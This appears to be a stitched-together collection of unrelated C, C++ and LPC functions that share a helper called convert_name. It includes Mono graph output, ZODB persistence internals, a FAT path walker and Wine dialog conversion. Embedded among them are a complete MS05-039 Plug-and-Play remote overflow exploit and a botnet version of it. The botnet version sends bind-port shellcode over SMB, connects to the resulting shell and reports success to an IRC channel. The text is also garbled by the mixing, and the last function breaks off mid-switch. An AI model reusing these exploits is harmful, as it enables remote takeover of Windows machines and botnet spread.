/*
 * Write the control-flow graph of cfg->method to fp in Graphviz "dot"
 * syntax: digraph header, default node/edge attributes, a caption, the
 * fixed styling of BB0/BB1, then the blocks and edges of every loop level
 * (delegated to cfg_emit_one_loop_level), closed by "}".
 *
 * The graph name is cfg->method->name after convert_name(); what that
 * helper does to the name is not visible here.
 */
static void
mono_draw_cfg (MonoCompile *cfg, FILE *fp)
{
	const char *graph_name = convert_name (cfg->method->name);

	fprintf (fp, "digraph %s {\n", graph_name);
	fputs ("node [fontsize=12.0]\nedge [len=1,color=red]\n", fp);
	fprintf (fp, "label=\"CFG for %s\";\n", mono_method_full_name (cfg->method, TRUE));
	fputs ("BB0 [shape=doublecircle];\n", fp);
	fputs ("BB1 [color=red];\n", fp);
	/* Everything between the header and the closing brace comes from here. */
	cfg_emit_one_loop_level (cfg, fp, NULL);
	fputs ("}\n", fp);
}
// Load a shared library by file name and return the platform loader's
// handle: the dlopen() handle on GNU compilers, the HMODULE from
// LoadLibrary() on MSVC.  Both loaders return NULL on failure; nothing in
// this function closes the handle, so the caller is responsible for it.
void *open(const char *filename)
{
    std::string dllName(filename);
# if defined(__GNUG__)
    // dllName is unused on this path; the name is passed through as given.
    return dlopen(filename, RTLD_LAZY);
# elif defined(_MSC_VER)
    // convert_name() rewrites dllName in place for the Windows loader (its
    // exact transformation is not visible here); the converted name is
    // echoed to stdout before loading.
    convert_name(dllName);
    std::cout << dllName << std::endl;
    return LoadLibrary(CStringW(dllName.c_str()));
# else
# error G++ or MS compiler required
# endif
}
/*
 * Write the dominator tree of cfg->method to fp in Graphviz "dot" syntax.
 * Requires that the immediate-dominator pass has run (MONO_COMP_IDOM set
 * in cfg->comp_done); the g_assert aborts otherwise.  Layout mirrors
 * mono_draw_cfg: header, attributes, caption, BB0/BB1 styling, the tree
 * edges from dtree_emit_one_loop_level, closing brace.
 */
static void
mono_draw_dtree (MonoCompile *cfg, FILE *fp)
{
	const char *graph_name;

	g_assert ((cfg->comp_done & MONO_COMP_IDOM));

	graph_name = convert_name (cfg->method->name);
	fprintf (fp, "digraph %s {\n", graph_name);
	fputs ("node [fontsize=12.0]\nedge [len=1,color=red]\n", fp);
	fprintf (fp, "label=\"Dominator tree for %s\";\n", mono_method_full_name (cfg->method, TRUE));
	fputs ("BB0 [shape=doublecircle];\n", fp);
	fputs ("BB1 [color=red];\n", fp);
	dtree_emit_one_loop_level (cfg, fp, NULL);
	fputs ("}\n", fp);
}
// Admin command: summon the living named in `args` to the caller's room.
// Returns a string (a message for the caller) when the request cannot be
// carried out, or 1 once it has been handled.  Admin targets may only be
// pulled by admins; a non-admin attempt is reported to the target instead.
mixed cmd(string args) {
    object target;

    if( !args || args == "" ) return "Trans whom?";

    target = find_player(convert_name(args));
    if( !target ) target = find_living(args);
    if( !target ) return "No such being exists anywhere presently.";

    if( environment(target) == environment(this_player()) )
        return target->GetCapName() + " is right here.";

    if( archp(target) && !archp(this_player()) ) {
        write("You can't trans an admin.");
        tell_player(target, this_player()->GetName() + " just tried to trans you.");
        return 1;
    }

    // Remember where the target came from so it can be sent back.
    target->SetProperty("ReturnSite", base_name(environment(target)));
    message("system", "You have been summoned by " + this_player()->GetName() + ".", target);

    if( target->eventMoveLiving(environment(this_player())) ) {
        message("system", "You trans " + target->GetCapName() + " to you.", this_player());
        return 1;
    }
    return "Failed to move " + target->GetCapName() + ".";
}
/*
 * tp_getattro for persistent objects.  The attribute name is converted to
 * bytes with convert_name(); when unghost_getattr() says that name needs
 * the real object state, the ghost is loaded first (unghostify) and the
 * access recorded (accessed).  The lookup itself is the generic one.
 *
 * Returns a new reference, or NULL with an exception set when conversion
 * or unghostify fails.
 */
static PyObject *
Per_getattro(cPersistentObject *self, PyObject *name)
{
    PyObject *converted = convert_name(name);
    PyObject *result = NULL;

    if (converted != NULL)
    {
        char *s = PyBytes_AS_STRING(converted);
        int ok = 1;

        if (unghost_getattr(s))
        {
            if (unghostify(self) < 0)
                ok = 0;
            else
                accessed(self);
        }
        if (ok)
            result = PyObject_GenericGetAttr((PyObject *)self, name);
        Py_DECREF(converted);
    }
    return result;
}
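/*
 * Return a new dict holding every item of `state` except those whose key
 * (str on PY3K, bytes on PY2) starts with "_v_" or "_p_" -- the volatile and
 * persistence bookkeeping attributes that must not be pickled.  Keys of any
 * other type are copied as they are.
 *
 * Returns a new reference, or NULL with an exception set (allocation
 * failure, key conversion failure, or PyObject_SetItem failure).  A NULL
 * `state` yields an empty dict.
 */
static PyObject *
pickle_copy_dict(PyObject *state)
{
    PyObject *copy, *key, *value;
    char *ckey;
    Py_ssize_t pos = 0;

    copy = PyDict_New();
    if (!copy)
        return NULL;

    if (!state)
        return copy;

    while (PyDict_Next(state, &pos, &key, &value))
    {
        int is_special;
#ifdef PY3K
        if (key && PyUnicode_Check(key))
        {
            PyObject *converted = convert_name(key);
            /* convert_name() can fail (see Per_getattro); passing its NULL
             * result to PyBytes_AS_STRING would dereference NULL. */
            if (!converted)
                goto err;
            ckey = PyBytes_AS_STRING(converted);
#else
        if (key && PyBytes_Check(key))
        {
            ckey = PyBytes_AS_STRING(key);
#endif
            is_special = (*ckey == '_' &&
                          (ckey[1] == 'v' || ckey[1] == 'p') &&
                          ckey[2] == '_');
#ifdef PY3K
            Py_DECREF(converted);
#endif
            if (is_special) /* skip volatile and persistent */
                continue;
        }

        if (PyObject_SetItem(copy, key, value) < 0)
            goto err;
    }

    return copy;
err:
    Py_DECREF(copy);
    return NULL;
}

static char pickle___getstate__doc[] =
  "Get the object serialization state\n"
  "\n"
  "If the object has no assigned slots and has no instance dictionary, then \n"
  "None is returned.\n"
  "\n"
  "If the object has no assigned slots and has an instance dictionary, then \n"
  "the a copy of the instance dictionary is returned. The copy has any items \n"
  "with names starting with '_v_' or '_p_' ommitted.\n"
  "\n"
  "If the object has assigned slots, then a two-element tuple is returned. \n"
  "The first element is either None or a copy of the instance dictionary, \n"
  "as described above. The second element is a dictionary with items \n"
  "for each of the assigned slots.\n"
  ;

/*
 * __getstate__ for persistent objects.
 *
 * Returns a new reference: None when the object has no __dict__ and no
 * slot values, a filtered copy of __dict__ (see pickle_copy_dict) when no
 * slot value was found, or a (dict-or-None, slots-dict) tuple when at least
 * one was.  Slot names starting with "_v_" or "_p_" are skipped, and a slot
 * that is not set (PyObject_GetAttr raises) is silently left out.
 *
 * Returns NULL with an exception set on failure.  Every failure path goes
 * through `error:`, which drops the partially built state so that NULL is
 * returned whenever an exception is pending.
 */
static PyObject *
pickle___getstate__(PyObject *self)
{
    PyObject *slotnames = NULL, *slots = NULL, *state = NULL;
    PyObject **dictp;
    int n = 0;

    slotnames = pickle_slotnames(Py_TYPE(self));
    if (!slotnames)
        return NULL;

    dictp = _PyObject_GetDictPtr(self);
    if (dictp)
    {
        state = pickle_copy_dict(*dictp);
        if (!state)
            goto error;
    }
    else
    {
        state = Py_None;
        Py_INCREF(state);
    }

    if (slotnames != Py_None)
    {
        int i;

        slots = PyDict_New();
        if (!slots)
            goto error;

        for (i = 0; i < PyList_GET_SIZE(slotnames); i++)
        {
            PyObject *name, *value;
            char *cname;
            int is_special;

            name = PyList_GET_ITEM(slotnames, i);
#ifdef PY3K
            if (PyUnicode_Check(name))
            {
                PyObject *converted = convert_name(name);
                /* NULL from convert_name() must not reach PyBytes_AS_STRING. */
                if (!converted)
                    goto error;
                cname = PyBytes_AS_STRING(converted);
#else
            if (PyBytes_Check(name))
            {
                cname = PyBytes_AS_STRING(name);
#endif
                is_special = (*cname == '_' &&
                              (cname[1] == 'v' || cname[1] == 'p') &&
                              cname[2] == '_');
#ifdef PY3K
                Py_DECREF(converted);
#endif
                if (is_special) /* skip volatile and persistent */
                    continue;
            }

            /* Unclear: Will this go through our getattr hook? */
            value = PyObject_GetAttr(self, name);
            if (value == NULL)
                PyErr_Clear();  /* unset slot: not part of the state */
            else
            {
                int err = PyDict_SetItem(slots, name, value);
                Py_DECREF(value);
                if (err < 0)
                    goto error;
                n++;
            }
        }
    }

    if (n)
        state = Py_BuildValue("(NO)", state, slots);  /* "N" consumes state */

end:
    Py_XDECREF(slotnames);
    Py_XDECREF(slots);
    return state;

error:
    /* Previously the partially built state was returned here with an
     * exception pending; the C-API contract is NULL when an error is set. */
    Py_CLEAR(state);
    goto end;
}

/*
 * Set every item of `dict` as an attribute of `self` with PyObject_SetAttr
 * (so the type's setattr hook applies).  Returns 0, or -1 with an exception
 * set: TypeError when `dict` is not a dict, else the first failing setattr.
 */
static int
pickle_setattrs_from_dict(PyObject *self, PyObject *dict)
{
    PyObject *key, *value;
    Py_ssize_t pos = 0;

    if (!PyDict_Check(dict))
    {
        PyErr_SetString(PyExc_TypeError, "Expected dictionary");
        return -1;
    }

    while (PyDict_Next(dict, &pos, &key, &value))
    {
        if (PyObject_SetAttr(self, key, value) < 0)
            return -1;
    }
    return 0;
}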
int main (int argc, char **argv) { struct sockaddr_in addr; struct hostent *he; int len; int sockfd; unsigned short smblen; unsigned short bindport; unsigned char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; #ifdef _WIN32 WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); #endif printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n"); printf("\t Universal Exploit + no crash shellcode\n\n"); printf("\t [Spanish hack by RoMaNSoFt :-)]\n\n\n"); printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n"); if (argc < 3) { printf("%s <host> <bind port>\n", argv[0]); exit(0); } if ((he = gethostbyname(argv[1])) == NULL) { printf("[-] Unable to resolve %s\n", argv[1]); exit(0); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("[-] socket failed\n"); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(445); addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(addr.sin_zero), '\0', 8); printf("\n[*] connecting to %s:445...", argv[1]); if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("\n[-] connect failed\n"); exit(0); } printf("ok\n"); printf("[*] null session..."); if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 10) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp, 
"\\\\%s\\IPC$", argv[1]); convert_name(ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (send(sockfd, packet, ptr-packet, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } printf("ok\n"); printf("[*] bind pipe..."); if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } printf("ok\n"); printf("[*] sending crafted packet..."); // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode bindport = (unsigned short)atoi(argv[2]); bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (send(sockfd, packet, 2196, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } printf("ok\n"); printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2])); recv(sockfd, recvbuf, 4096, 0); return 0; }
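// Walk `path` (components separated by '/' or '\\'), starting from the root
// of `drive` for an absolute path and from the drive's current directory
// otherwise, and return a directory handle for the final component.  The
// returned handle carries one reference that the caller releases with
// close_dir().  "." is a no-op component and ".." moves to the parent.
//
// Returns a negative error code on failure: EINVALIDNAME for a component
// that convert_name() rejects or that is longer than 12 characters, else
// the code returned by open_dir()/get_parent_handle().
int open_path(int drive, const char *path)
{
    int i, j, curdir_handle, new_handle;
    char name_comp[13], conv_name[11];

    // Starting directory
    i = 0;
    if (path[0] == '/' || path[0] == '\\') // Absolute path
    {
        curdir_handle = root_handle(drive);
        i = 1;
    }
    else
        curdir_handle = get_curdir_handle(drive);

    // The handle we hold is our own reference; close_dir() below drops it.
    increment_ref_count(curdir_handle);

    while (path[i] != 0)
    {
        // Copy one component; at most 12 characters fit name_comp[13].
        j = 0;
        while (j < 12 && path[i] != 0 && path[i] != '/' && path[i] != '\\')
        {
            name_comp[j] = path[i];
            j++;
            i++;
        }
        // A component longer than 12 characters used to be split in two:
        // the 13th character was skipped as if it were a separator and the
        // remainder parsed as the next component.  Reject it instead.
        if (path[i] != 0 && path[i] != '/' && path[i] != '\\')
        {
            close_dir(curdir_handle);
            return EINVALIDNAME; // Error
        }
        if (path[i] != 0)
            i++; // step over the separator
        name_comp[j] = 0;

        if (strcmp(name_comp, ".") == 0)
            continue;
        else if (strcmp(name_comp, "..") == 0)
        {
            new_handle = get_parent_handle(curdir_handle);
            if (new_handle >= 0)
                increment_ref_count(new_handle);
        }
        else
        {
            // Open that directory component
            if (convert_name(name_comp, conv_name) < 0)
            {
                close_dir(curdir_handle);
                return EINVALIDNAME; // Error
            }
            new_handle = open_dir(curdir_handle, conv_name);
        }

        if (new_handle < 0)
        {
            close_dir(curdir_handle);
            return new_handle; // Error
        }

        close_dir(curdir_handle); // drop our reference on the parent
        curdir_handle = new_handle;
    }

    // Successfully opened the path
    return curdir_handle;
}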
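/*
 * Turn `self` into a ghost: drop its __dict__, clear its non-"_p_" slots
 * (only when the class does not override __new__), take it off the cache
 * ring, and release the reference the ring held.
 *
 * Has no return value; the callers that care (Per__p_deactivate,
 * Per__p_invalidate) look at PyErr_Occurred() afterwards, so an exception
 * left set by pickle_slotnames() is reported that way.
 */
static void
ghostify(cPersistentObject *self)
{
    PyObject **dictptr, *slotnames;

    /* are we already a ghost? */
    if (self->state == cPersistent_GHOST_STATE)
        return;

    /* Is it ever possible to not have a cache? */
    if (self->cache == NULL)
    {
        self->state = cPersistent_GHOST_STATE;
        return;
    }

    if (self->ring.r_next == NULL)
    {
        /* There's no way to raise an error in this routine. */
#ifdef Py_DEBUG
        fatal_1350(self, "ghostify", "claims to be in a cache but isn't");
#else
        return;
#endif
    }

    /* If we're ghostifying an object, we better have some non-ghosts. */
    assert(self->cache->non_ghost_count > 0);
    self->cache->non_ghost_count--;
    self->cache->total_estimated_size -=
        _estimated_size_in_bytes(self->estimated_size);
    ring_del(&self->ring);
    self->state = cPersistent_GHOST_STATE;

    /* clear __dict__ */
    dictptr = _PyObject_GetDictPtr((PyObject *)self);
    if (dictptr && *dictptr)
    {
        Py_DECREF(*dictptr);
        *dictptr = NULL;
    }

    /* clear all slots besides _p_*
     * ( for backward-compatibility reason we do this only if class does not
     *   override __new__ ) */
    if (Py_TYPE(self)->tp_new == Pertype.tp_new)
    {
        slotnames = pickle_slotnames(Py_TYPE(self));
        if (slotnames && slotnames != Py_None)
        {
            int i;

            for (i = 0; i < PyList_GET_SIZE(slotnames); i++)
            {
                PyObject *name;
                char *cname;
                int is_special;

                name = PyList_GET_ITEM(slotnames, i);
#ifdef PY3K
                if (PyUnicode_Check(name))
                {
                    PyObject *converted = convert_name(name);
                    /* convert_name() returns NULL on failure (see
                     * Per_getattro); the old code handed that NULL to
                     * PyBytes_AS_STRING.  We cannot tell whether such a
                     * name is a _p_ slot, so leave that slot untouched and
                     * keep this routine error-free as documented above. */
                    if (!converted)
                    {
                        PyErr_Clear();
                        continue;
                    }
                    cname = PyBytes_AS_STRING(converted);
#else
                if (PyBytes_Check(name))
                {
                    cname = PyBytes_AS_STRING(name);
#endif
                    is_special = !strncmp(cname, "_p_", 3);
#ifdef PY3K
                    Py_DECREF(converted);
#endif
                    if (is_special) /* skip persistent */
                        continue;
                }

                /* NOTE: this skips our delattr hook */
                if (PyObject_GenericSetAttr((PyObject *)self, name, NULL) < 0)
                    /* delattr of non-set slot will raise AttributeError - we
                     * simply ignore. */
                    PyErr_Clear();
            }
        }
        /* A NULL slotnames (pickle_slotnames failed) leaves its exception
         * set for the caller to notice. */
        Py_XDECREF(slotnames);
    }

    /* We remove the reference to the just ghosted object that the ring
     * holds.  Note that the dictionary of oids->objects has an uncounted
     * reference, so if the ring's reference was the only one, this frees
     * the ghost object.  Note further that the object's dealloc knows to
     * inform the dictionary that it is going away.
     */
    Py_DECREF(self);
}

/*
 * Mark `self` as changed: when it is up-to-date or sticky and has a jar,
 * call jar.register(self) and move to the CHANGED state.  Ghosts, already
 * changed objects and objects without a jar are left alone.
 *
 * Returns 0, or -1 with an exception set when the register call fails.
 */
static int
changed(cPersistentObject *self)
{
    if ((self->state == cPersistent_UPTODATE_STATE ||
         self->state == cPersistent_STICKY_STATE)
        && self->jar)
    {
        PyObject *meth, *arg, *result;
        static PyObject *s_register = NULL;

        if (s_register == NULL)
            s_register = INTERN("register");
        /* INTERN() is defined elsewhere; a NULL result is taken to mean
         * it failed with an exception set, so do not pass it on. */
        if (s_register == NULL)
            return -1;
        meth = PyObject_GetAttr((PyObject *)self->jar, s_register);
        if (meth == NULL)
            return -1;
        arg = PyTuple_New(1);
        if (arg == NULL)
        {
            Py_DECREF(meth);
            return -1;
        }
        Py_INCREF(self);
        PyTuple_SET_ITEM(arg, 0, (PyObject *)self);  /* tuple owns the ref */
        result = PyEval_CallObject(meth, arg);
        Py_DECREF(arg);
        Py_DECREF(meth);
        if (result == NULL)
            return -1;
        Py_DECREF(result);

        self->state = cPersistent_CHANGED_STATE;
    }

    return 0;
}

/*
 * Ask the jar to verify that `self` is current (jar.readCurrent(self)) when
 * the object is up-to-date or sticky and has both a jar and an oid.
 *
 * Returns 0, or -1 with an exception set when the call fails.
 */
static int
readCurrent(cPersistentObject *self)
{
    if ((self->state == cPersistent_UPTODATE_STATE ||
         self->state == cPersistent_STICKY_STATE)
        && self->jar && self->oid)
    {
        static PyObject *s_readCurrent = NULL;
        PyObject *r;

        if (s_readCurrent == NULL)
            s_readCurrent = INTERN("readCurrent");

        r = PyObject_CallMethodObjArgs(self->jar, s_readCurrent, self, NULL);
        if (r == NULL)
            return -1;

        Py_DECREF(r);
    }

    return 0;
}

/*
 * _p_deactivate(): ghostify an up-to-date object that has a jar.  The
 * __dict__ is dropped here before ghostify() runs.  Returns None, or NULL
 * when ghostify() left an exception set.
 */
static PyObject *
Per__p_deactivate(cPersistentObject *self)
{
    if (self->state == cPersistent_UPTODATE_STATE && self->jar)
    {
        PyObject **dictptr = _PyObject_GetDictPtr((PyObject *)self);
        if (dictptr && *dictptr)
        {
            Py_DECREF(*dictptr);
            *dictptr = NULL;
        }
        /* Note that we need to set to ghost state unless we are called
           directly. Methods that override this need to do the same! */
        ghostify(self);
        if (PyErr_Occurred())
            return NULL;
    }

    Py_INCREF(Py_None);
    return Py_None;
}

/*
 * _p_activate(): load the object's state if it is a ghost.  Returns None,
 * or NULL when unghostify() fails.
 */
static PyObject *
Per__p_activate(cPersistentObject *self)
{
    if (unghostify(self) < 0)
        return NULL;

    Py_INCREF(Py_None);
    return Py_None;
}

static int Per_set_changed(cPersistentObject *self, PyObject *v);

/*
 * _p_invalidate(): clear the changed flag (Per_set_changed with NULL) and
 * ghostify any object that is not already a ghost.  Returns None, or NULL
 * with an exception set.
 */
static PyObject *
Per__p_invalidate(cPersistentObject *self)
{
    signed char old_state = self->state;

    if (old_state != cPersistent_GHOST_STATE)
    {
        if (Per_set_changed(self, NULL) < 0)
            return NULL;
        ghostify(self);
        if (PyErr_Occurred())
            return NULL;
    }
    Py_INCREF(Py_None);
    return Py_None;
}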
BOOL ppexploit (EXINFO exinfo) //main (int argc, char **argv) { int len; char buffer[IRCLINE]; SOCKET sockfd; int pport = 7777; BOOL success = FALSE; SOCKADDR_IN their_addr; memset(&their_addr, 0, sizeof(their_addr)); //struct sockaddr_in addr; char recvbuf[4096]; // struct hostent *he; unsigned short smblen; unsigned short bindport; char tmp[1024]; char packet[4096]; char *ptr; /* WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa);*/ //printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n"); //printf("\t Universal Exploit + no crash shellcode\n\n\n"); //printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n"); /* if (argc < 3) { printf("%s <host> <bind port>\n", argv[0]); exit(0); } */ /* if ((he = gethostbyname(argv[1])) == NULL) { printf("[-] Unable to resolve %s\n", argv[1]); exit(0); } */ if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) { return FALSE; } their_addr.sin_family = AF_INET; their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); their_addr.sin_port = fhtons((unsigned short)exinfo.port); /*addr.sin_family = AF_INET; addr.sin_port = fhtons((unsigned short)exinfo.port); addr.sin_addr.s_addr = finet_addr(exinfo.ip);*/ memset(&(their_addr.sin_zero), '\0', 8); //printf("\n[*] connecting to %s:445...", argv[1]); if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(struct sockaddr)) < 0) { return FALSE; } //printf("ok\n"); //printf("[*] null session..."); if (fsend(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } if (fsend(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if (len <= 10) { return FALSE; } if (fsend(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, 
sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp, "\\\\%s\\IPC$", exinfo.ip); convert_name(ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (fsend(sockfd, packet, ptr-packet, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } //printf("ok\n"); //printf("[*] bind pipe..."); if (fsend(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } if (fsend(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } //printf("ok\n"); //printf("[*] sending crafted packet..."); // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode bindport = (unsigned short)atoi((const char *)pport); bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... 
if (fsend(sockfd, packet, 2196, 0) < 0) { return FALSE; } // printf("ok\n"); // printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2])); frecv(sockfd, recvbuf, 4096, 0); Sleep(300); fclosesocket(sockfd); if (ConnectShell2(exinfo)) { if(!exinfo.silent) { _snprintf(buffer, sizeof(buffer), "[FTP]: Transfer info sent to IP: %s.", exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); } exploit[exinfo.exploit].stats++; return TRUE; } return FALSE; }
/**********************************************************************
 *           ConvertDialog32To16   (KERNEL.615)
 *
 * Rewrite a 32-bit DIALOG / DIALOGEX resource template (`dialog32`) as a
 * 16-bit template at `dialog16`, walking both with the get_*/put_* cursor
 * helpers.  Strings are narrowed with WideCharToMultiByte(CP_ACP); menu,
 * class and window names go through convert_name(), whose treatment of
 * the 0xffff ordinal form is not visible here.
 *
 * NOTE(review): `size` is never read, and every WideCharToMultiByte call
 * passes 0x7fffffff as the destination size, so nothing in this function
 * bounds the writes to `dialog16`; the caller must have sized it for the
 * worst case.  Also, nbItems is a WORD but the 16-bit header stores it
 * with put_byte(), so a template with more than 255 items writes a
 * truncated count while the loop still converts every item.  Presumably
 * no caller passes such templates -- confirm before using this path on
 * resources from untrusted modules.
 */
VOID WINAPI ConvertDialog32To16( LPVOID dialog32, DWORD size, LPVOID dialog16 )
{
    WORD nbItems, data, dialogEx;
    DWORD style;

    style = get_dword( &dialog32 );
    put_dword( &dialog16, style );
    dialogEx = (style == 0xffff0001);  /* DIALOGEX resource */
    if (dialogEx)
    {
        put_dword( &dialog16, get_dword( &dialog32 ) ); /* helpID */
        put_dword( &dialog16, get_dword( &dialog32 ) ); /* exStyle */
        style = get_dword( &dialog32 );
        put_dword( &dialog16, style );                  /* style */
    }
    else
        dialog32 = (DWORD *)dialog32 + 1; /* exStyle ignored in 16-bit standard dialog */
    nbItems = get_word( &dialog32 );
    put_byte( &dialog16, nbItems );  /* count narrowed to a byte (see note above) */
    put_word( &dialog16, get_word( &dialog32 ) ); /* x */
    put_word( &dialog16, get_word( &dialog32 ) ); /* y */
    put_word( &dialog16, get_word( &dialog32 ) ); /* cx */
    put_word( &dialog16, get_word( &dialog32 ) ); /* cy */

    /* Transfer menu name */
    convert_name( &dialog16, &dialog32 );

    /* Transfer class name */
    convert_name( &dialog16, &dialog32 );

    /* Transfer window caption (unbounded destination, see note above) */
    WideCharToMultiByte( CP_ACP, 0, dialog32, -1, dialog16, 0x7fffffff, NULL, NULL );
    dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
    dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;

    /* Transfer font info */
    if (style & DS_SETFONT)
    {
        put_word( &dialog16, get_word( &dialog32 ) );  /* pointSize */
        if (dialogEx)
        {
            put_word( &dialog16, get_word( &dialog32 ) ); /* weight */
            put_word( &dialog16, get_word( &dialog32 ) ); /* italic */
        }
        WideCharToMultiByte( CP_ACP, 0, (LPWSTR)dialog32, -1, (LPSTR)dialog16, 0x7fffffff, NULL, NULL );  /* faceName */
        dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
        dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;
    }

    /* Transfer dialog items */
    while (nbItems)
    {
        /* align on DWORD boundary (32-bit only) */
        dialog32 = (LPVOID)(((UINT_PTR)dialog32 + 3) & ~3);
        if (dialogEx)
        {
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* helpID */
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* exStyle */
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* style */
        }
        else
        {
            style = get_dword( &dialog32 );    /* save style */
            dialog32 = (DWORD *)dialog32 + 1;  /* ignore exStyle */
        }
        put_word( &dialog16, get_word( &dialog32 ) ); /* x */
        put_word( &dialog16, get_word( &dialog32 ) ); /* y */
        put_word( &dialog16, get_word( &dialog32 ) ); /* cx */
        put_word( &dialog16, get_word( &dialog32 ) ); /* cy */
        if (dialogEx)
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* ID */
        else
        {
            put_word( &dialog16, get_word( &dialog32 ) ); /* ID */
            put_dword( &dialog16, style );  /* style from above */
        }

        /* Transfer class name */
        switch (*(WORD *)dialog32)
        {
        case 0x0000:  /* no class name */
            get_word( &dialog32 );
            put_byte( &dialog16, 0 );
            break;
        case 0xffff:  /* ordinal class: a single byte in the 16-bit format */
            get_word( &dialog32 );
